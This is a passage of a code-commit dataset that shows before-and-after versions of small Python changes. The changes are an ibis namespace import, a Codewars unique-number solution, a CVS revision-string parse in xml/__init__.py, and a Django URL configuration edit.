args = ['--pyargs', 'ibis']
if not include_e2e:
args.extend(['-m', 'not e2e'])
pytest.main(args)
| Add desc to ibis namespace | Add desc to ibis namespace
| Python | apache-2.0 | mariusvniekerk/ibis,koverholt/ibis,shaunstanislaus/ibis,deepfield/ibis,Supermem/ibis,o0neup/ibis,ibis-project/ibis,ashhher3/ibis,fivejjs/ibis,Supermem/ibis,koverholt/ibis,cloudera/ibis,laserson/ibis,mahantheshhv/ibis,cloudera/ibis,korotkyn/ibis,Winterflower/ibis,ibis-project/ibis,fivejjs/ibis,adamobeng/ibis,dboyliao/ibis,glenioborges/ibis,o0neup/ibis,korotkyn/ibis,fivejjs/ibis,Winterflower/ibis,ibis-project/ibis,ashhher3/ibis,Winterflower/ibis,koverholt/ibis,dboyliao/ibis,o0neup/ibis,glenioborges/ibis,laserson/ibis,mahantheshhv/ibis,koverholt/ibis,ashhher3/ibis,dboyliao/ibis,aslihandincer/ibis,ibis-project/ibis,aslihandincer/ibis,dalejung/ibis,mariusvniekerk/ibis,glenioborges/ibis,cpcloud/ibis,laserson/ibis,deepfield/ibis,adamobeng/ibis,wesm/ibis,cpcloud/ibis,cpcloud/ibis,wesm/ibis,glenioborges/ibis,adamobeng/ibis,cpcloud/ibis,dalejung/ibis,mahantheshhv/ibis,adamobeng/ibis,cloudera/ibis,mariusvniekerk/ibis,ashhher3/ibis,aslihandincer/ibis,mahantheshhv/ibis,aslihandincer/ibis,Supermem/ibis,dalejung/ibis,Supermem/ibis,shaunstanislaus/ibis,deepfield/ibis,shaunstanislaus/ibis,dboyliao/ibis,laserson/ibis,korotkyn/ibis,wesm/ibis,korotkyn/ibis,mariusvniekerk/ibis,deepfield/ibis | # Copyright 2014 Cloudera Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ibis.connection import impala_connect
import ibis.expr.api as api
import ibis.expr.types as ir
import ibis.config_init
from ibis.config import options
def test(include_e2e=False):
import pytest
args = ['--pyargs', 'ibis']
if not include_e2e:
args.extend(['-m', 'not e2e'])
pytest.main(args)
Add desc to ibis namespace | # Copyright 2014 Cloudera Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ibis.connection import impala_connect
import ibis.expr.api as api
import ibis.expr.types as ir
from ibis.expr.api import desc
import ibis.config_init
from ibis.config import options
def test(include_e2e=False):
import pytest
args = ['--pyargs', 'ibis']
if not include_e2e:
args.extend(['-m', 'not e2e'])
pytest.main(args)
| <commit_before># Copyright 2014 Cloudera Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ibis.connection import impala_connect
import ibis.expr.api as api
import ibis.expr.types as ir
import ibis.config_init
from ibis.config import options
def test(include_e2e=False):
import pytest
args = ['--pyargs', 'ibis']
if not include_e2e:
args.extend(['-m', 'not e2e'])
pytest.main(args)
<commit_msg>Add desc to ibis namespace<commit_after> | # Copyright 2014 Cloudera Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ibis.connection import impala_connect
import ibis.expr.api as api
import ibis.expr.types as ir
from ibis.expr.api import desc
import ibis.config_init
from ibis.config import options
def test(include_e2e=False):
import pytest
args = ['--pyargs', 'ibis']
if not include_e2e:
args.extend(['-m', 'not e2e'])
pytest.main(args)
| # Copyright 2014 Cloudera Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ibis.connection import impala_connect
import ibis.expr.api as api
import ibis.expr.types as ir
import ibis.config_init
from ibis.config import options
def test(include_e2e=False):
import pytest
args = ['--pyargs', 'ibis']
if not include_e2e:
args.extend(['-m', 'not e2e'])
pytest.main(args)
Add desc to ibis namespace# Copyright 2014 Cloudera Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ibis.connection import impala_connect
import ibis.expr.api as api
import ibis.expr.types as ir
from ibis.expr.api import desc
import ibis.config_init
from ibis.config import options
def test(include_e2e=False):
import pytest
args = ['--pyargs', 'ibis']
if not include_e2e:
args.extend(['-m', 'not e2e'])
pytest.main(args)
| <commit_before># Copyright 2014 Cloudera Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ibis.connection import impala_connect
import ibis.expr.api as api
import ibis.expr.types as ir
import ibis.config_init
from ibis.config import options
def test(include_e2e=False):
import pytest
args = ['--pyargs', 'ibis']
if not include_e2e:
args.extend(['-m', 'not e2e'])
pytest.main(args)
<commit_msg>Add desc to ibis namespace<commit_after># Copyright 2014 Cloudera Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ibis.connection import impala_connect
import ibis.expr.api as api
import ibis.expr.types as ir
from ibis.expr.api import desc
import ibis.config_init
from ibis.config import options
def test(include_e2e=False):
import pytest
args = ['--pyargs', 'ibis']
if not include_e2e:
args.extend(['-m', 'not e2e'])
pytest.main(args)
|
e43c03fbb04de6ef067a22b62ce5c8049020831a | cw_find_the_unique_number.py | cw_find_the_unique_number.py | """Codewars: Find the unique number
6 kyu
URL: https://www.codewars.com/kata/find-the-unique-number-1/
There is an array with some numbers. All numbers are equal except for one.
Try to find it!
find_uniq([ 1, 1, 1, 2, 1, 1 ]) == 2
find_uniq([ 0, 0, 0.55, 0, 0 ]) == 0.55
It’s guaranteed that array contains more than 3 numbers.
The tests contain some very huge arrays, so think about performance.
This is the first kata in series:
- Find the unique number (this kata)
- Find the unique string
- Find The Unique
"""
def find_uniq(arr):
# your code here
return n # n: unique integer in the array
def main():
pass
if __name__ == '__main__':
main()
| """Codewars: Find the unique number
6 kyu
URL: https://www.codewars.com/kata/find-the-unique-number-1/
There is an array with some numbers. All numbers are equal except for one.
Try to find it!
find_uniq([ 1, 1, 1, 2, 1, 1 ]) == 2
find_uniq([ 0, 0, 0.55, 0, 0 ]) == 0.55
It's guaranteed that array contains more than 3 numbers.
The tests contain some very huge arrays, so think about performance.
This is the first kata in series:
- Find the unique number (this kata)
- Find the unique string
- Find The Unique
"""
def find_uniq(arr):
"""
Use dict to collect number counts.
Time complexity: O(n).
Space complexity: O(1).
"""
from collections import defaultdict
num_counts = defaultdict(int)
for num in arr:
num_counts[num] += 1
for num, count in num_counts.items():
if count == 1:
n = num
return n
def main():
# Output: 2
arr = [ 1, 1, 1, 2, 1, 1 ]
print find_uniq(arr)
# Output: 0.55
arr = [ 0, 0, 0.55, 0, 0 ]
print find_uniq(arr)
if __name__ == '__main__':
main()
| Complete dict sol w/ time/space complexity | Complete dict sol w/ time/space complexity
| Python | bsd-2-clause | bowen0701/algorithms_data_structures | """Codewars: Find the unique number
6 kyu
URL: https://www.codewars.com/kata/find-the-unique-number-1/
There is an array with some numbers. All numbers are equal except for one.
Try to find it!
find_uniq([ 1, 1, 1, 2, 1, 1 ]) == 2
find_uniq([ 0, 0, 0.55, 0, 0 ]) == 0.55
It’s guaranteed that array contains more than 3 numbers.
The tests contain some very huge arrays, so think about performance.
This is the first kata in series:
- Find the unique number (this kata)
- Find the unique string
- Find The Unique
"""
def find_uniq(arr):
# your code here
return n # n: unique integer in the array
def main():
pass
if __name__ == '__main__':
main()
Complete dict sol w/ time/space complexity | """Codewars: Find the unique number
6 kyu
URL: https://www.codewars.com/kata/find-the-unique-number-1/
There is an array with some numbers. All numbers are equal except for one.
Try to find it!
find_uniq([ 1, 1, 1, 2, 1, 1 ]) == 2
find_uniq([ 0, 0, 0.55, 0, 0 ]) == 0.55
It's guaranteed that array contains more than 3 numbers.
The tests contain some very huge arrays, so think about performance.
This is the first kata in series:
- Find the unique number (this kata)
- Find the unique string
- Find The Unique
"""
def find_uniq(arr):
"""
Use dict to collect number counts.
Time complexity: O(n).
Space complexity: O(1).
"""
from collections import defaultdict
num_counts = defaultdict(int)
for num in arr:
num_counts[num] += 1
for num, count in num_counts.items():
if count == 1:
n = num
return n
def main():
# Output: 2
arr = [ 1, 1, 1, 2, 1, 1 ]
print find_uniq(arr)
# Output: 0.55
arr = [ 0, 0, 0.55, 0, 0 ]
print find_uniq(arr)
if __name__ == '__main__':
main()
| <commit_before>"""Codewars: Find the unique number
6 kyu
URL: https://www.codewars.com/kata/find-the-unique-number-1/
There is an array with some numbers. All numbers are equal except for one.
Try to find it!
find_uniq([ 1, 1, 1, 2, 1, 1 ]) == 2
find_uniq([ 0, 0, 0.55, 0, 0 ]) == 0.55
It’s guaranteed that array contains more than 3 numbers.
The tests contain some very huge arrays, so think about performance.
This is the first kata in series:
- Find the unique number (this kata)
- Find the unique string
- Find The Unique
"""
def find_uniq(arr):
# your code here
return n # n: unique integer in the array
def main():
pass
if __name__ == '__main__':
main()
<commit_msg>Complete dict sol w/ time/space complexity<commit_after> | """Codewars: Find the unique number
6 kyu
URL: https://www.codewars.com/kata/find-the-unique-number-1/
There is an array with some numbers. All numbers are equal except for one.
Try to find it!
find_uniq([ 1, 1, 1, 2, 1, 1 ]) == 2
find_uniq([ 0, 0, 0.55, 0, 0 ]) == 0.55
It's guaranteed that array contains more than 3 numbers.
The tests contain some very huge arrays, so think about performance.
This is the first kata in series:
- Find the unique number (this kata)
- Find the unique string
- Find The Unique
"""
def find_uniq(arr):
"""
Use dict to collect number counts.
Time complexity: O(n).
Space complexity: O(1).
"""
from collections import defaultdict
num_counts = defaultdict(int)
for num in arr:
num_counts[num] += 1
for num, count in num_counts.items():
if count == 1:
n = num
return n
def main():
# Output: 2
arr = [ 1, 1, 1, 2, 1, 1 ]
print find_uniq(arr)
# Output: 0.55
arr = [ 0, 0, 0.55, 0, 0 ]
print find_uniq(arr)
if __name__ == '__main__':
main()
| """Codewars: Find the unique number
6 kyu
URL: https://www.codewars.com/kata/find-the-unique-number-1/
There is an array with some numbers. All numbers are equal except for one.
Try to find it!
find_uniq([ 1, 1, 1, 2, 1, 1 ]) == 2
find_uniq([ 0, 0, 0.55, 0, 0 ]) == 0.55
It’s guaranteed that array contains more than 3 numbers.
The tests contain some very huge arrays, so think about performance.
This is the first kata in series:
- Find the unique number (this kata)
- Find the unique string
- Find The Unique
"""
def find_uniq(arr):
# your code here
return n # n: unique integer in the array
def main():
pass
if __name__ == '__main__':
main()
Complete dict sol w/ time/space complexity"""Codewars: Find the unique number
6 kyu
URL: https://www.codewars.com/kata/find-the-unique-number-1/
There is an array with some numbers. All numbers are equal except for one.
Try to find it!
find_uniq([ 1, 1, 1, 2, 1, 1 ]) == 2
find_uniq([ 0, 0, 0.55, 0, 0 ]) == 0.55
It's guaranteed that array contains more than 3 numbers.
The tests contain some very huge arrays, so think about performance.
This is the first kata in series:
- Find the unique number (this kata)
- Find the unique string
- Find The Unique
"""
def find_uniq(arr):
"""
Use dict to collect number counts.
Time complexity: O(n).
Space complexity: O(1).
"""
from collections import defaultdict
num_counts = defaultdict(int)
for num in arr:
num_counts[num] += 1
for num, count in num_counts.items():
if count == 1:
n = num
return n
def main():
# Output: 2
arr = [ 1, 1, 1, 2, 1, 1 ]
print find_uniq(arr)
# Output: 0.55
arr = [ 0, 0, 0.55, 0, 0 ]
print find_uniq(arr)
if __name__ == '__main__':
main()
| <commit_before>"""Codewars: Find the unique number
6 kyu
URL: https://www.codewars.com/kata/find-the-unique-number-1/
There is an array with some numbers. All numbers are equal except for one.
Try to find it!
find_uniq([ 1, 1, 1, 2, 1, 1 ]) == 2
find_uniq([ 0, 0, 0.55, 0, 0 ]) == 0.55
It’s guaranteed that array contains more than 3 numbers.
The tests contain some very huge arrays, so think about performance.
This is the first kata in series:
- Find the unique number (this kata)
- Find the unique string
- Find The Unique
"""
def find_uniq(arr):
# your code here
return n # n: unique integer in the array
def main():
pass
if __name__ == '__main__':
main()
<commit_msg>Complete dict sol w/ time/space complexity<commit_after>"""Codewars: Find the unique number
6 kyu
URL: https://www.codewars.com/kata/find-the-unique-number-1/
There is an array with some numbers. All numbers are equal except for one.
Try to find it!
find_uniq([ 1, 1, 1, 2, 1, 1 ]) == 2
find_uniq([ 0, 0, 0.55, 0, 0 ]) == 0.55
It's guaranteed that array contains more than 3 numbers.
The tests contain some very huge arrays, so think about performance.
This is the first kata in series:
- Find the unique number (this kata)
- Find the unique string
- Find The Unique
"""
def find_uniq(arr):
"""
Use dict to collect number counts.
Time complexity: O(n).
Space complexity: O(1).
"""
from collections import defaultdict
num_counts = defaultdict(int)
for num in arr:
num_counts[num] += 1
for num, count in num_counts.items():
if count == 1:
n = num
return n
def main():
# Output: 2
arr = [ 1, 1, 1, 2, 1, 1 ]
print find_uniq(arr)
# Output: 0.55
arr = [ 0, 0, 0.55, 0, 0 ]
print find_uniq(arr)
if __name__ == '__main__':
main()
|
9ca11ae97ac21d6525da853c9ec3e8007939d187 | Lib/xml/__init__.py | Lib/xml/__init__.py | """Core XML support for Python.
This package contains three sub-packages:
dom -- The W3C Document Object Model. This supports DOM Level 1 +
Namespaces.
parsers -- Python wrappers for XML parsers (currently only supports Expat).
sax -- The Simple API for XML, developed by XML-Dev, led by David
Megginson and ported to Python by Lars Marius Garshol. This
supports the SAX 2 API.
"""
__all__ = ["dom", "parsers", "sax"]
__version__ = "$Revision$".split()[1]
_MINIMUM_XMLPLUS_VERSION = (0, 6, 1)
try:
import _xmlplus
except ImportError:
pass
else:
try:
v = _xmlplus.version_info
except AttributeError:
# _xmlplue is too old; ignore it
pass
else:
if v >= _MINIMUM_XMLPLUS_VERSION:
import sys
sys.modules[__name__] = _xmlplus
else:
del v
| """Core XML support for Python.
This package contains three sub-packages:
dom -- The W3C Document Object Model. This supports DOM Level 1 +
Namespaces.
parsers -- Python wrappers for XML parsers (currently only supports Expat).
sax -- The Simple API for XML, developed by XML-Dev, led by David
Megginson and ported to Python by Lars Marius Garshol. This
supports the SAX 2 API.
"""
__all__ = ["dom", "parsers", "sax"]
# When being checked-out without options, this has the form
# "<dollar>Revision: x.y </dollar>"
# When exported using -kv, it is "x.y".
__version__ = "$Revision$".split()[-2][0]
_MINIMUM_XMLPLUS_VERSION = (0, 6, 1)
try:
import _xmlplus
except ImportError:
pass
else:
try:
v = _xmlplus.version_info
except AttributeError:
# _xmlplue is too old; ignore it
pass
else:
if v >= _MINIMUM_XMLPLUS_VERSION:
import sys
sys.modules[__name__] = _xmlplus
else:
del v
| Use Guido's trick for always extracting the version number from a CVS Revision string correctly, even under -kv. | Use Guido's trick for always extracting the version number from a
CVS Revision string correctly, even under -kv.
| Python | mit | sk-/python2.7-type-annotator,sk-/python2.7-type-annotator,sk-/python2.7-type-annotator | """Core XML support for Python.
This package contains three sub-packages:
dom -- The W3C Document Object Model. This supports DOM Level 1 +
Namespaces.
parsers -- Python wrappers for XML parsers (currently only supports Expat).
sax -- The Simple API for XML, developed by XML-Dev, led by David
Megginson and ported to Python by Lars Marius Garshol. This
supports the SAX 2 API.
"""
__all__ = ["dom", "parsers", "sax"]
__version__ = "$Revision$".split()[1]
_MINIMUM_XMLPLUS_VERSION = (0, 6, 1)
try:
import _xmlplus
except ImportError:
pass
else:
try:
v = _xmlplus.version_info
except AttributeError:
# _xmlplue is too old; ignore it
pass
else:
if v >= _MINIMUM_XMLPLUS_VERSION:
import sys
sys.modules[__name__] = _xmlplus
else:
del v
Use Guido's trick for always extracting the version number from a
CVS Revision string correctly, even under -kv. | """Core XML support for Python.
This package contains three sub-packages:
dom -- The W3C Document Object Model. This supports DOM Level 1 +
Namespaces.
parsers -- Python wrappers for XML parsers (currently only supports Expat).
sax -- The Simple API for XML, developed by XML-Dev, led by David
Megginson and ported to Python by Lars Marius Garshol. This
supports the SAX 2 API.
"""
__all__ = ["dom", "parsers", "sax"]
# When being checked-out without options, this has the form
# "<dollar>Revision: x.y </dollar>"
# When exported using -kv, it is "x.y".
__version__ = "$Revision$".split()[-2][0]
_MINIMUM_XMLPLUS_VERSION = (0, 6, 1)
try:
import _xmlplus
except ImportError:
pass
else:
try:
v = _xmlplus.version_info
except AttributeError:
# _xmlplue is too old; ignore it
pass
else:
if v >= _MINIMUM_XMLPLUS_VERSION:
import sys
sys.modules[__name__] = _xmlplus
else:
del v
| <commit_before>"""Core XML support for Python.
This package contains three sub-packages:
dom -- The W3C Document Object Model. This supports DOM Level 1 +
Namespaces.
parsers -- Python wrappers for XML parsers (currently only supports Expat).
sax -- The Simple API for XML, developed by XML-Dev, led by David
Megginson and ported to Python by Lars Marius Garshol. This
supports the SAX 2 API.
"""
__all__ = ["dom", "parsers", "sax"]
__version__ = "$Revision$".split()[1]
_MINIMUM_XMLPLUS_VERSION = (0, 6, 1)
try:
import _xmlplus
except ImportError:
pass
else:
try:
v = _xmlplus.version_info
except AttributeError:
# _xmlplue is too old; ignore it
pass
else:
if v >= _MINIMUM_XMLPLUS_VERSION:
import sys
sys.modules[__name__] = _xmlplus
else:
del v
<commit_msg>Use Guido's trick for always extracting the version number from a
CVS Revision string correctly, even under -kv.<commit_after> | """Core XML support for Python.
This package contains three sub-packages:
dom -- The W3C Document Object Model. This supports DOM Level 1 +
Namespaces.
parsers -- Python wrappers for XML parsers (currently only supports Expat).
sax -- The Simple API for XML, developed by XML-Dev, led by David
Megginson and ported to Python by Lars Marius Garshol. This
supports the SAX 2 API.
"""
__all__ = ["dom", "parsers", "sax"]
# When being checked-out without options, this has the form
# "<dollar>Revision: x.y </dollar>"
# When exported using -kv, it is "x.y".
__version__ = "$Revision$".split()[-2][0]
_MINIMUM_XMLPLUS_VERSION = (0, 6, 1)
try:
import _xmlplus
except ImportError:
pass
else:
try:
v = _xmlplus.version_info
except AttributeError:
# _xmlplue is too old; ignore it
pass
else:
if v >= _MINIMUM_XMLPLUS_VERSION:
import sys
sys.modules[__name__] = _xmlplus
else:
del v
| """Core XML support for Python.
This package contains three sub-packages:
dom -- The W3C Document Object Model. This supports DOM Level 1 +
Namespaces.
parsers -- Python wrappers for XML parsers (currently only supports Expat).
sax -- The Simple API for XML, developed by XML-Dev, led by David
Megginson and ported to Python by Lars Marius Garshol. This
supports the SAX 2 API.
"""
__all__ = ["dom", "parsers", "sax"]
__version__ = "$Revision$".split()[1]
_MINIMUM_XMLPLUS_VERSION = (0, 6, 1)
try:
import _xmlplus
except ImportError:
pass
else:
try:
v = _xmlplus.version_info
except AttributeError:
# _xmlplue is too old; ignore it
pass
else:
if v >= _MINIMUM_XMLPLUS_VERSION:
import sys
sys.modules[__name__] = _xmlplus
else:
del v
Use Guido's trick for always extracting the version number from a
CVS Revision string correctly, even under -kv."""Core XML support for Python.
This package contains three sub-packages:
dom -- The W3C Document Object Model. This supports DOM Level 1 +
Namespaces.
parsers -- Python wrappers for XML parsers (currently only supports Expat).
sax -- The Simple API for XML, developed by XML-Dev, led by David
Megginson and ported to Python by Lars Marius Garshol. This
supports the SAX 2 API.
"""
__all__ = ["dom", "parsers", "sax"]
# When being checked-out without options, this has the form
# "<dollar>Revision: x.y </dollar>"
# When exported using -kv, it is "x.y".
__version__ = "$Revision$".split()[-2][0]
_MINIMUM_XMLPLUS_VERSION = (0, 6, 1)
try:
import _xmlplus
except ImportError:
pass
else:
try:
v = _xmlplus.version_info
except AttributeError:
# _xmlplue is too old; ignore it
pass
else:
if v >= _MINIMUM_XMLPLUS_VERSION:
import sys
sys.modules[__name__] = _xmlplus
else:
del v
| <commit_before>"""Core XML support for Python.
This package contains three sub-packages:
dom -- The W3C Document Object Model. This supports DOM Level 1 +
Namespaces.
parsers -- Python wrappers for XML parsers (currently only supports Expat).
sax -- The Simple API for XML, developed by XML-Dev, led by David
Megginson and ported to Python by Lars Marius Garshol. This
supports the SAX 2 API.
"""
__all__ = ["dom", "parsers", "sax"]
__version__ = "$Revision$".split()[1]
_MINIMUM_XMLPLUS_VERSION = (0, 6, 1)
try:
import _xmlplus
except ImportError:
pass
else:
try:
v = _xmlplus.version_info
except AttributeError:
# _xmlplue is too old; ignore it
pass
else:
if v >= _MINIMUM_XMLPLUS_VERSION:
import sys
sys.modules[__name__] = _xmlplus
else:
del v
<commit_msg>Use Guido's trick for always extracting the version number from a
CVS Revision string correctly, even under -kv.<commit_after>"""Core XML support for Python.
This package contains three sub-packages:
dom -- The W3C Document Object Model. This supports DOM Level 1 +
Namespaces.
parsers -- Python wrappers for XML parsers (currently only supports Expat).
sax -- The Simple API for XML, developed by XML-Dev, led by David
Megginson and ported to Python by Lars Marius Garshol. This
supports the SAX 2 API.
"""
__all__ = ["dom", "parsers", "sax"]
# When being checked-out without options, this has the form
# "<dollar>Revision: x.y </dollar>"
# When exported using -kv, it is "x.y".
__version__ = "$Revision$".split()[-2][0]
_MINIMUM_XMLPLUS_VERSION = (0, 6, 1)
try:
import _xmlplus
except ImportError:
pass
else:
try:
v = _xmlplus.version_info
except AttributeError:
# _xmlplue is too old; ignore it
pass
else:
if v >= _MINIMUM_XMLPLUS_VERSION:
import sys
sys.modules[__name__] = _xmlplus
else:
del v
|
2b1cc5b2426994953e8f8b937364d91f4e7aadf2 | MyHub/MyHub/urls.py | MyHub/MyHub/urls.py | from django.conf.urls import patterns, include, url
from MyHub.home.views import home_page
from MyHub.resume.views import resume_page
from MyHub.projects.views import projects_page
from MyHub.contact.views import contact_page
from MyHub.views import loader_page
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'MyHub.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', loader_page, name='loader'),
url(r'^home/$', home_page, name='index'),
url(r'^resume/$', resume_page, name='resume'),
url(r'^projects/$', projects_page, name='projects'),
url(r'^contact/$', contact_page, name='contact'),
url(r'^admin/', include(admin.site.urls)),
) + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
| from django.conf.urls import patterns, include, url
from MyHub.home.views import home_page
from MyHub.resume.views import resume_page
from MyHub.projects.views import projects_page
from MyHub.contact.views import contact_page
from MyHub.views import loader_page
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'MyHub.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', home_page, name='loader'),
# url(r'^home/$', home_page, name='index'),
# url(r'^resume/$', resume_page, name='resume'),
# url(r'^projects/$', projects_page, name='projects'),
# url(r'^contact/$', contact_page, name='contact'),
# url(r'^admin/', include(admin.site.urls)),
) + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
| Change default URL to display home content. Temporary fix. | Change default URL to display home content. Temporary fix.
| Python | mit | sebastienbarbier/sebastienbarbier.com,sebastienbarbier/sebastienbarbier.com,sebastienbarbier/sebastienbarbier.com,sebastienbarbier/sebastienbarbier.com | from django.conf.urls import patterns, include, url
from MyHub.home.views import home_page
from MyHub.resume.views import resume_page
from MyHub.projects.views import projects_page
from MyHub.contact.views import contact_page
from MyHub.views import loader_page
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'MyHub.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', loader_page, name='loader'),
url(r'^home/$', home_page, name='index'),
url(r'^resume/$', resume_page, name='resume'),
url(r'^projects/$', projects_page, name='projects'),
url(r'^contact/$', contact_page, name='contact'),
url(r'^admin/', include(admin.site.urls)),
) + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
Change default URL to display home content. Temporary fix. | from django.conf.urls import patterns, include, url
from MyHub.home.views import home_page
from MyHub.resume.views import resume_page
from MyHub.projects.views import projects_page
from MyHub.contact.views import contact_page
from MyHub.views import loader_page
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'MyHub.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', home_page, name='loader'),
# url(r'^home/$', home_page, name='index'),
# url(r'^resume/$', resume_page, name='resume'),
# url(r'^projects/$', projects_page, name='projects'),
# url(r'^contact/$', contact_page, name='contact'),
# url(r'^admin/', include(admin.site.urls)),
) + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
| <commit_before>from django.conf.urls import patterns, include, url
from MyHub.home.views import home_page
from MyHub.resume.views import resume_page
from MyHub.projects.views import projects_page
from MyHub.contact.views import contact_page
from MyHub.views import loader_page
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'MyHub.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', loader_page, name='loader'),
url(r'^home/$', home_page, name='index'),
url(r'^resume/$', resume_page, name='resume'),
url(r'^projects/$', projects_page, name='projects'),
url(r'^contact/$', contact_page, name='contact'),
url(r'^admin/', include(admin.site.urls)),
) + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
<commit_msg>Change default URL to display home content. Temporary fix.<commit_after> | from django.conf.urls import patterns, include, url
from MyHub.home.views import home_page
from MyHub.resume.views import resume_page
from MyHub.projects.views import projects_page
from MyHub.contact.views import contact_page
from MyHub.views import loader_page
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'MyHub.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', home_page, name='loader'),
# url(r'^home/$', home_page, name='index'),
# url(r'^resume/$', resume_page, name='resume'),
# url(r'^projects/$', projects_page, name='projects'),
# url(r'^contact/$', contact_page, name='contact'),
# url(r'^admin/', include(admin.site.urls)),
) + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
| from django.conf.urls import patterns, include, url
from MyHub.home.views import home_page
from MyHub.resume.views import resume_page
from MyHub.projects.views import projects_page
from MyHub.contact.views import contact_page
from MyHub.views import loader_page
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'MyHub.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', loader_page, name='loader'),
url(r'^home/$', home_page, name='index'),
url(r'^resume/$', resume_page, name='resume'),
url(r'^projects/$', projects_page, name='projects'),
url(r'^contact/$', contact_page, name='contact'),
url(r'^admin/', include(admin.site.urls)),
) + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
Change default URL to display home content. Temporary fix.from django.conf.urls import patterns, include, url
from MyHub.home.views import home_page
from MyHub.resume.views import resume_page
from MyHub.projects.views import projects_page
from MyHub.contact.views import contact_page
from MyHub.views import loader_page
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'MyHub.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', home_page, name='loader'),
# url(r'^home/$', home_page, name='index'),
# url(r'^resume/$', resume_page, name='resume'),
# url(r'^projects/$', projects_page, name='projects'),
# url(r'^contact/$', contact_page, name='contact'),
# url(r'^admin/', include(admin.site.urls)),
) + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
| <commit_before>from django.conf.urls import patterns, include, url
from MyHub.home.views import home_page
from MyHub.resume.views import resume_page
from MyHub.projects.views import projects_page
from MyHub.contact.views import contact_page
from MyHub.views import loader_page
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
admin.autodiscover()
urlpatterns = patterns('',
